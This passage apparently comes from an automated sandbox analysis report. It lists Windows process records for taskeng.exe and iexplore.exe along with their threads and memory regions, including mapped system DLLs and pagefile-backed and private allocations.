end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2350 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2351 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 46 os_tid = 0xbf4 Thread: id = 47 os_tid = 0x6dc Thread: id = 48 os_tid = 0x6e0 Thread: id = 49 os_tid = 0x688 Thread: id = 50 os_tid = 0x5e0 Thread: id = 51 os_tid = 0x72c Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x74c3a000" os_pid = "0x5f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "taskeng.exe {A63D8ADE-049B-493D-9EF8-CBCBD23E6074} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 864 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 865 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 866 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 867 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 868 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 869 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 870 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 871 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 872 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 873 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 874 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 875 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 876 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 877 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 878 start_va = 0x620000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 879 start_va = 0x7b0000 end_va = 0x1baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 880 start_va = 0x1bb0000 end_va = 0x1fa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bb0000" filename = "" Region: id = 881 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 882 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 883 start_va = 0x21d0000 end_va = 0x224ffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 884 start_va = 0x2250000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 885 start_va = 0x23a0000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 886 start_va = 0x2520000 end_va = 0x27eefff entry_point = 0x2520000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 887 start_va = 0x2810000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 888 start_va = 0x2890000 end_va = 0x296efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002890000" filename = "" Region: id = 889 start_va = 0x2a40000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 890 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fca2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 891 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770c5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 892 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 893 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 894 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 895 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 896 start_va = 0xffd10000 end_va = 0xffd83fff entry_point = 0xffd10000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 897 start_va = 0x7fef4b40000 end_va = 0x7fef4b48fff entry_point = 0x7fef4b40000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 898 start_va = 0x7fefa960000 end_va = 0x7fefa969fff entry_point = 0x7fefa960000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 899 start_va = 0x7fefb5d0000 end_va = 0x7fefb604fff entry_point = 0x7fefb5d1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 900 start_va = 0x7fefb610000 end_va = 0x7fefb627fff entry_point = 0x7fefb611130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 901 start_va = 0x7fefba40000 end_va = 0x7fefba95fff entry_point = 0x7fefba4bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 902 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc711064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 903 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 904 start_va = 0x7fefcc00000 end_va = 0x7fefcc6cfff entry_point = 0x7fefcc00000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 905 start_va = 0x7fefcfe0000 end_va = 0x7fefd004fff entry_point = 0x7fefcfe9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 906 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd011010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 907 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd1010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 908 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b30e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 909 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd5ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 910 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd623274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 911 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd720760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 912 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 913 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde63330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 914 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 0x7fefe221c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 915 start_va = 0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 916 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 917 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe43ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 918 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe5225a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 919 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 920 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe641080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 921 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 922 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 923 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 924 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 925 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 926 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 927 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 928 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 929 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 930 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 52 os_tid = 0x81c Thread: id = 53 os_tid = 0x6c8 Thread: id = 54 os_tid = 0x6c4 Thread: id = 55 os_tid = 0x610 Thread: id = 56 os_tid = 0x604 Thread: id = 57 os_tid = 0x5fc Process: id = "5" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x22b67000" os_pid = "0x8e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" -nohome" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 948 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 949 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 950 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 951 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 952 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 953 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 954 start_va = 0x1340000 end_va = 0x13e5fff entry_point = 0x1340000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 955 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 956 start_va = 0x773b0000 end_va = 0x7752ffff entry_point = 0x773b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 957 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 958 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 959 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 960 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 961 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 962 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 963 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 964 start_va = 0x4a0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 965 start_va = 0x73a80000 end_va = 0x73adbfff entry_point = 0x73abf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 966 start_va = 0x73ae0000 end_va = 0x73b1efff entry_point = 0x73b0de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 967 start_va = 0x73b50000 end_va = 0x73b57fff entry_point = 0x73b520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 968 start_va = 0x680000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 969 start_va = 0x751d0000 end_va = 0x752dffff entry_point = 0x751e32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 970 start_va = 0x75ca0000 end_va = 0x75ce5fff entry_point = 0x75ca7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 971 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fb0000" filename = "" Region: id = 972 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x0 region_type = private name = "private_0x00000000770b0000" filename = "" Region: id = 973 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 974 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 975 start_va = 0x74f00000 end_va = 0x74f0bfff entry_point = 0x74f010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 976 start_va = 0x74f10000 end_va = 0x74f6ffff entry_point = 0x74f2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 977 start_va = 0x74f70000 end_va = 0x750cbfff entry_point = 0x74fbba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 978 start_va = 0x750d0000 end_va = 0x7516cfff entry_point = 0x75103fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 979 start_va = 0x751c0000 end_va = 0x751c9fff entry_point = 0x751c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 980 start_va = 0x753b0000 end_va = 0x754e5fff entry_point = 0x753b1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 981 start_va = 0x75520000 end_va = 0x755aefff entry_point = 0x75523fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 982 start_va = 0x755d0000 end_va = 0x7567bfff entry_point = 0x755da472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 983 start_va = 0x75780000 end_va = 0x757d6fff entry_point = 0x75799ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 984 start_va = 0x757e0000 end_va = 0x758cffff entry_point = 0x757f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 985 start_va = 0x758d0000 end_va = 0x758dbfff entry_point = 0x758d238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 986 start_va = 0x758e0000 end_va = 0x75adafff entry_point = 0x758e22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 987 start_va = 0x75ba0000 end_va = 0x75c94fff entry_point = 0x75ba1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 988 start_va = 0x75cf0000 end_va = 0x76939fff entry_point = 0x75d71601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 989 start_va = 0x76b20000 end_va = 0x76baffff entry_point = 0x76b36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 990 start_va = 0x76c40000 end_va = 0x76c58fff entry_point = 0x76c44975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 991 start_va = 0x76cf0000 end_va = 0x76e0cfff entry_point = 0x76cf158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 992 start_va = 0x76e10000 end_va = 0x76f0ffff entry_point = 0x76e2b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 993 start_va = 0x76f10000 end_va = 0x76faffff entry_point = 0x76f249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 994 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 995 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 996 start_va = 0x780000 end_va = 0x907fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 997 start_va = 0x920000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 998 start_va = 0x752e0000 end_va = 0x753abfff entry_point = 0x752e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 999 start_va = 0x75b40000 end_va = 0x75b9ffff entry_point = 0x75b5158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1000 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1001 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1002 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0xd0000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1003 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1004 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1005 start_va = 0x930000 end_va = 0xab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1006 start_va = 0xac0000 end_va = 0xd8efff entry_point = 0xac0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1007 start_va = 0x13f0000 end_va = 0x27effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 1008 start_va = 0x721e0000 end_va = 0x72c5ffff entry_point = 0x721e0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 1009 start_va = 0x74050000 end_va = 0x7408bfff entry_point = 0x74050000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1010 start_va = 0x756e0000 end_va = 0x756e4fff entry_point = 0x756e0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1011 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1012 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1013 start_va = 0x74720000 end_va = 0x748bdfff entry_point = 0x7474e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1014 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1015 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1016 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1017 start_va = 0x74990000 end_va = 0x7499afff entry_point = 0x74991992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1018 start_va = 0x150000 end_va = 0x15bfff entry_point = 0x150000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1019 start_va = 0x160000 end_va = 0x167fff 